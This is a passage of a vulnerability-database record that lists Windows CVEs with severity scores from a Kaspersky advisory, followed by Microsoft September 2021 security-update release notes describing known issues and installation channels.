\n[CVE-2020-1311](<https://vulners.com/cve/CVE-2020-1311>)6.8High \n[CVE-2020-1255](<https://vulners.com/cve/CVE-2020-1255>)6.5High \n[CVE-2020-1254](<https://vulners.com/cve/CVE-2020-1254>)7.2High \n[CVE-2020-1271](<https://vulners.com/cve/CVE-2020-1271>)4.6Warning \n[CVE-2020-1270](<https://vulners.com/cve/CVE-2020-1270>)4.6Warning \n[CVE-2020-1251](<https://vulners.com/cve/CVE-2020-1251>)7.2High \n[CVE-2020-1253](<https://vulners.com/cve/CVE-2020-1253>)7.2High \n[CVE-2020-1272](<https://vulners.com/cve/CVE-2020-1272>)7.2High \n[CVE-2020-1302](<https://vulners.com/cve/CVE-2020-1302>)4.6Warning \n[CVE-2020-0986](<https://vulners.com/cve/CVE-2020-0986>)7.2High \n[CVE-2020-1264](<https://vulners.com/cve/CVE-2020-1264>)4.6Warning \n[CVE-2020-1265](<https://vulners.com/cve/CVE-2020-1265>)4.6Warning \n[CVE-2020-1266](<https://vulners.com/cve/CVE-2020-1266>)7.2High \n[CVE-2020-1261](<https://vulners.com/cve/CVE-2020-1261>)2.1Warning \n[CVE-2020-1268](<https://vulners.com/cve/CVE-2020-1268>)2.1Warning \n[CVE-2020-1269](<https://vulners.com/cve/CVE-2020-1269>)7.2High \n[CVE-2020-1290](<https://vulners.com/cve/CVE-2020-1290>)2.1Warning \n[CVE-2020-1293](<https://vulners.com/cve/CVE-2020-1293>)4.6Warning \n[CVE-2020-1292](<https://vulners.com/cve/CVE-2020-1292>)6.8High \n[CVE-2020-1294](<https://vulners.com/cve/CVE-2020-1294>)6.8High \n[CVE-2020-1296](<https://vulners.com/cve/CVE-2020-1296>)2.1Warning \n[CVE-2020-1259](<https://vulners.com/cve/CVE-2020-1259>)4.0Warning \n[CVE-2020-1211](<https://vulners.com/cve/CVE-2020-1211>)6.8High \n[CVE-2020-1162](<https://vulners.com/cve/CVE-2020-1162>)4.6Warning \n[CVE-2020-1217](<https://vulners.com/cve/CVE-2020-1217>)6.8High \n[CVE-2020-1282](<https://vulners.com/cve/CVE-2020-1282>)6.8High \n[CVE-2020-1283](<https://vulners.com/cve/CVE-2020-1283>)7.1High \n[CVE-2020-1280](<https://vulners.com/cve/CVE-2020-1280>)6.8High \n[CVE-2020-1286](<https://vulners.com/cve/CVE-2020-1286>)9.3Critical \n[CVE-2020-1284](<https://vulners.com/cve/CVE-2020-1284>)4.3Warning \n[CVE-2020-1202](<https://vulners.com/cve/CVE-2020-1202>)7.2High \n[CVE-2020-1203](<https://vulners.com/cve/CVE-2020-1203>)7.2High \n[CVE-2020-1201](<https://vulners.com/cve/CVE-2020-1201>)7.2High \n[CVE-2020-1206](<https://vulners.com/cve/CVE-2020-1206>)5.0Critical \n[CVE-2020-1204](<https://vulners.com/cve/CVE-2020-1204>)3.6Warning \n[CVE-2020-1324](<https://vulners.com/cve/CVE-2020-1324>)4.6Warning \n[CVE-2020-1209](<https://vulners.com/cve/CVE-2020-1209>)6.8High \n[CVE-2020-1238](<https://vulners.com/cve/CVE-2020-1238>)6.8High \n[CVE-2020-1237](<https://vulners.com/cve/CVE-2020-1237>)6.8High \n[CVE-2020-1235](<https://vulners.com/cve/CVE-2020-1235>)6.8High \n[CVE-2020-1234](<https://vulners.com/cve/CVE-2020-1234>)6.8High \n[CVE-2020-1233](<https://vulners.com/cve/CVE-2020-1233>)6.8High \n[CVE-2020-1232](<https://vulners.com/cve/CVE-2020-1232>)4.3Warning \n[CVE-2020-1231](<https://vulners.com/cve/CVE-2020-1231>)6.8High \n[CVE-2020-1334](<https://vulners.com/cve/CVE-2020-1334>)4.6Warning \n[CVE-2020-1222](<https://vulners.com/cve/CVE-2020-1222>)4.6Warning \n[CVE-2020-1309](<https://vulners.com/cve/CVE-2020-1309>)6.8High \n[CVE-2020-1307](<https://vulners.com/cve/CVE-2020-1307>)9.3Critical \n[CVE-2020-1306](<https://vulners.com/cve/CVE-2020-1306>)4.6Warning \n[CVE-2020-1305](<https://vulners.com/cve/CVE-2020-1305>)6.8High \n[CVE-2020-1304](<https://vulners.com/cve/CVE-2020-1304>)6.8High \n[CVE-2020-1197](<https://vulners.com/cve/CVE-2020-1197>)7.2High \n[CVE-2020-1199](<https://vulners.com/cve/CVE-2020-1199>)7.2High \n[CVE-2020-1120](<https://vulners.com/cve/CVE-2020-1120>)4.9Warning \n[CVE-2020-1316](<https://vulners.com/cve/CVE-2020-1316>)7.2High \n[CVE-2020-1310](<https://vulners.com/cve/CVE-2020-1310>)7.2High \n[CVE-2020-1258](<https://vulners.com/cve/CVE-2020-1258>)7.2High \n[CVE-2020-1312](<https://vulners.com/cve/CVE-2020-1312>)4.6Warning \n[CVE-2020-1313](<https://vulners.com/cve/CVE-2020-1313>)6.8High \n[CVE-2020-1257](<https://vulners.com/cve/CVE-2020-1257>)4.6Warning \n[CVE-2020-1248](<https://vulners.com/cve/CVE-2020-1248>)9.3Critical \n[CVE-2020-1244](<https://vulners.com/cve/CVE-2020-1244>)5.8High \n[CVE-2020-1241](<https://vulners.com/cve/CVE-2020-1241>)6.8High \n[CVE-2020-0915](<https://vulners.com/cve/CVE-2020-0915>)7.2High \n[CVE-2020-0916](<https://vulners.com/cve/CVE-2020-0916>)7.2High \n[CVE-2020-1279](<https://vulners.com/cve/CVE-2020-1279>)4.6Warning \n[CVE-2020-1278](<https://vulners.com/cve/CVE-2020-1278>)4.6Warning \n[CVE-2020-1273](<https://vulners.com/cve/CVE-2020-1273>)4.6Warning \n[CVE-2020-1277](<https://vulners.com/cve/CVE-2020-1277>)4.6Warning \n[CVE-2020-1276](<https://vulners.com/cve/CVE-2020-1276>)4.6Warning \n[CVE-2020-1275](<https://vulners.com/cve/CVE-2020-1275>)4.6Warning \n[CVE-2020-1274](<https://vulners.com/cve/CVE-2020-1274>)4.6Warning\n\n### *KB list*:\n[4549951](<http://support.microsoft.com/kb/4549951>) \n[4556799](<http://support.microsoft.com/kb/4556799>) \n[4561649](<http://support.microsoft.com/kb/4561649>) \n[4560960](<http://support.microsoft.com/kb/4560960>) \n[4557957](<http://support.microsoft.com/kb/4557957>) \n[4561666](<http://support.microsoft.com/kb/4561666>) \n[4561602](<http://support.microsoft.com/kb/4561602>) \n[4561612](<http://support.microsoft.com/kb/4561612>) \n[4561674](<http://support.microsoft.com/kb/4561674>) \n[4561616](<http://support.microsoft.com/kb/4561616>) \n[4561608](<http://support.microsoft.com/kb/4561608>) \n[4561621](<http://support.microsoft.com/kb/4561621>) \n[4561673](<http://support.microsoft.com/kb/4561673>) \n[4570333](<http://support.microsoft.com/kb/4570333>) \n[4574727](<http://support.microsoft.com/kb/4574727>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T00:00:00", "type": "kaspersky", "title": "KLA11807 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1120", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1217", "CVE-2020-1222", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1265", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-21T00:00:00", "id": "KLA11807", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11807/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006729](<https://support.microsoft.com/help/5006729>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007255](<https://support.microsoft.com/help/5007255>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006729](<https://support.microsoft.com/help/5006729>). If after installing [KB5006729](<https://support.microsoft.com/help/5006729>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005627>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005627](<https://download.microsoft.com/download/6/3/a/63a7a18b-4013-4336-b8a9-b78228da6198/5005627.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005627 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005627", "href": "https://support.microsoft.com/en-us/help/5005627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:34", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005099](<https://support.microsoft.com/help/5005099>) (released August 10, 2021) and addresses the following issues:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5006739](<https://support.microsoft.com/help/5006739>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue is resolved in [KB5007260](<https://support.microsoft.com/help/5007260>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006739](<https://support.microsoft.com/help/5006739>). If after installing [KB5006739](<https://support.microsoft.com/help/5006739>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005623>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005623](<https://download.microsoft.com/download/f/e/b/feb6fda1-9d2a-40d5-9264-23b033a84e00/5005623.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005623 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005623", "href": "https://support.microsoft.com/en-us/help/5005623", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:30", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes quality improvements. Key changes include:\n\n * This update contains miscellaneous security improvements to internal OS functionality. No additional issues were documented for this release.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>).\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing this update, devices which attempt to connect to a network printer for the first time might fail to download and install the necessary printer drivers. Devices which had connected to and installed the printer prior to the installation of this update are unaffected and operations to that printer will succeed as usual.This issue has been observed in devices which access printers via a print server using HTTP connections. When a client connects to the server to install the printer, a directory mismatch occurs, which causes the installer files to generate incorrectly. As a result, the drivers may not download.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006732](<https://support.microsoft.com/help/5006732>). \nAfter installing this update on a print server, printing properties defined on that server might not be correctly provided to clients. Note this issue is specific to print servers and does not impact standard network printing. This issue will not cause printing operations to fail, however, custom settings defined on the server \u2013 for example, duplex print settings \u2013 will not be applied automatically, and clients will print with default settings only.This issue results from an improper building of the data file which contains the printer properties. Clients which receive this data file will not be able to use the file content and will instead proceed with default printing settings. Clients who have previously received the settings package prior to the installation of this update are unaffected. Servers which use default print settings and have no custom settings to provide to clients are unaffected.**Note** The printer connection methods described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5007245](<https://support.microsoft.com/help/5007245>). \nAfter installing this update, you might receive a prompt for administrative credentials every time you attempt to print in environments in which the print server and print client are in different times zones. **Note** The affected environments described in this issue are not commonly used by devices designed for home use. The printing environments affected by this issue are more commonly found in enterprises and organizations.| This issue was resolved in [KB5006732](<https://support.microsoft.com/help/5006732>). If after installing [KB5006732](<https://support.microsoft.com/help/5006732>) you still receive the prompt every time you print, see Q1 in the \"Frequently ask questions\" section of [KB5005652\u2014Manage new Point and Print default driver installation behavior (CVE-2021-34481)](<https://support.microsoft.com/help/5005652>). \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **REMINDER** If you are using Security-only updates, you will also need to install all previous Security-only updates and the latest cumulative update for Internet Explorer ([KB5005563](<https://support.microsoft.com/help/5005563>)).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other options below. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005607>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Update \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5005607](<https://download.microsoft.com/download/7/9/4/7944449d-0157-49a0-85ae-be5be2970e5a/5005607.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mskb", "title": "September 14, 2021\u2014KB5005607 (Security-only update)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-38667"], "modified": "2021-09-14T07:00:00", "id": "KB5005607", "href": "https://support.microsoft.com/en-us/help/5005607", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:30", "description": "None\n## **Summary**\n\nLearn more about this security update, including improvements and fixes, any known issues, and how to get the update. \n\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5005090](<https://support.microsoft.com/help/5005090>) (released August 10, 2021) and addresses the following issues:\n\n * Addresses an issue in which a driver might not install if the driver is signed with more than one code sign signatures.\n * This update also contains miscellaneous security improvements to internal OS functionality.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If 